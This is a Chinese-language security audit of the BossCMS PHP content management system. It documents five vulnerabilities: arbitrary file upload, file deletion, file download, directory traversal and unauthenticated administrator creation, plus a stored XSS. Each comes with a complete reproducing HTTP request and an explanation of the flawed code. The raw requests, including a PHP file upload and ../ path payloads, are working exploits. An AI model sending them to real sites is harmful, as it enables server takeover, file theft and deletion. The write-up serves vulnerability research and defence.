1、任意文件上传

限制

复现

POST /system/extend/ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1
Host: bosscms.com
Content-Length: 761
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAsLBZuxNv1g9kBB0
Accept: */*
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/attachment/attachment.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sle15srngo4hspjv2d7ifia6b5
Connection: close------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="name"1.php
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="type"application
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="lastModifiedDate"Wed Jun 07 2023 17:22:54 GMT+0800 (中国标准时间)
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="size"20
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryAsLBZuxNv1g9kBB0--

添加允许上传的类型，上传php文件不通过

直接通过链接形式上传文件，上传后会出现访问地址

代码

上传的逻辑值判断了是否有上传文件，和上传文件的大小，并没有对文件后缀和内容做处理

2、任意文件删除

限制

POST请求，path=upload

复现

POST /system/extend/ueditor/php/controller.php?action=delete HTTP/1.1
Host: bosscms.com
Content-Length: 17
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/image/image.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: closepath=upload/1.txt

代码

同文件里有delete函数，判断以post请求的path参数是否存在并且匹配是否以upload开头

判断config中store_type是否为空，如果 不为空的话调用oss类下的delete()方法反之调用dir类下的delete()方法搜索store_type发现该处功能为设置存储方式，默认为0  。所以 走dir类下的delete()  

replace对path进行简单的替换，没有涉及到要用的字符，所以可以直接写入路径../。if判断路径是否有文件，有则直接删除

3、任意文件下载

限制

mold=safe&part=backup&func=download&id=../../basic/1.txt

复现

GET /admin/?mold=safe&part=backup&func=download&id=../../basic/1.txt HTTP/1.1
Host: bosscms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=safe&part=backup&func=table
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close

代码

判断id参数是否存在，存在则拼接sql和路径赋值给$file.在判断$file是不是文件，是则返回header，readfile($file);直接读取这个文件

4、目录遍历

限制

action=listfile&folder=../ 

复现

GET /system/extend/ueditor/php/controller.php?action=listfile&folder=../ HTTP/1.1
Host: bosscms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: */*
Referer: http://bosscms.com/admin/?mold=site&part=site&func=init
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close

代码

先调用config指向fileManagerActionName(列出文件)，在返回listfile函数；在判断get-start和get-size参数是否存在并且是数字。

在继续调用lists,接受folder参数调用arrExist函数，判断数组是否存在，存在就键值分离，否则返回空；将结果赋值给$folder；$path = dir::replace($path.'/'.$folder);将$path拼接/和$folder在替换；下面对$path的操作都是read直接读路径

 通过opendir()、readdir()打开目录并读取目录中的内容  

5、未授权添加管理员

限制

mold=manager&part=manager&func=add

------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"eeee
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"2

复现

POST /admin/?mold=manager&part=manager&func=add HTTP/1.1
Host: bosscms.com
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bosscms.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrrq418NZS9wguXwR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=manager&part=manager&func=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"test
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"2

添加管理员抓到数据包，退出登录发送，添加成功-跳转到登录页面

代码

以post方式请求，$data为数组赋值，if判断新密码和重复的密码是否相同，if两次密码不为空，在if两次密码是否相等，相等则向密码md5赋值给$data[pasword]

如果要触发alert(保存成功)就不要满足if..else的条件。首先这里id是不存在的,else要让username不重复，lecel等级不等于1,就跳出条件语句执行alert(保存成功)，从头到尾都没有验证用户的登录状态

这里代码对username没有做xss处理也存在xss